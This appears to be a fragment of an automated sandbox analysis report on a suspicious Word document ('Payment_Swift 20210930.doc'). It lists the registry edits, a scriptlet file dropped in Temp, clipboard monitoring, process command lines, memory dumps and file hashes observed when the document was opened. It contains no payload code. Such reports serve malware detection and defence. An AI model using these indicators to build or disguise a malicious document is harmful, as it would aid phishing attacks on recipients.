Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-1076071834-4270782119-4084125449-2050494880-2007380509-1683145255-1556221127\DisplayName = "OICE_16_974FA576_32C1D314_104F" C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key deleted \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_104f\Children C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key deleted \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\oice_16_974fa576_32c1d314_104f C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key deleted \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-1076071834-4270782119-4084125449-2050494880-2007380509-1683145255-1556221127\Children C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-1076071834-4270782119-4084125449-2050494880-2007380509-1683145255-1556221127\Moniker = "oice_16_974fa576_32c1d314_104f" C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key created \Registry\User\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-1076071834-4270782119-4084125449-2050494880-2007380509-1683145255-1556221127\Children C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\Temp\{09372AF4-1371-4D9A-84D0-F92B2DD897F4}\abdtfhghgeghDh.ScT:Zone.Identifier C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payment_Swift 20210930.doc" /o ""

C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE

"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\FLTLDR.EXE" C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT

Network

Files

memory/656-114-0x00007FFA59300000-0x00007FFA59310000-memory.dmp

memory/656-115-0x00007FFA59300000-0x00007FFA59310000-memory.dmp

memory/656-116-0x00007FFA59300000-0x00007FFA59310000-memory.dmp

memory/656-117-0x00007FFA59300000-0x00007FFA59310000-memory.dmp

memory/656-119-0x00007FFA59300000-0x00007FFA59310000-memory.dmp

memory/656-118-0x00007FFA7B6B0000-0x00007FFA7E1D3000-memory.dmp

memory/656-122-0x00007FFA775A0000-0x00007FFA7868E000-memory.dmp

memory/656-123-0x00007FFA73090000-0x00007FFA74F85000-memory.dmp

memory/3932-360-0x0000000000000000-mapping.dmp

memory/3932-362-0x00007FFA59300000-0x00007FFA59310000-memory.dmp

memory/3932-363-0x00007FFA59300000-0x00007FFA59310000-memory.dmp

memory/3932-364-0x00007FFA59300000-0x00007FFA59310000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\oice_16_974fa576_32c1d314_104f\AC\Temp\FL991E.tmp

MD5 ae7607b58d1746991f39ea120b2ae40e
SHA1 b020075cf1f70e57777533b65d76dd2992823e0d
SHA256 684784247045bc76c1fc098adbb80745c314d51885f78800bd8df4be3e954e23
SHA512 6c6da9c7131604a17fea3391580311c6be941c776068a39e9bda7f4b5b8ebec976d76c8f2eeb0743a79a0daf7b3a71c6e4534e9565eff71f9f1d0624687eb7d6

memory/3932-370-0x00007FFA59300000-0x00007FFA59310000-memory.dmp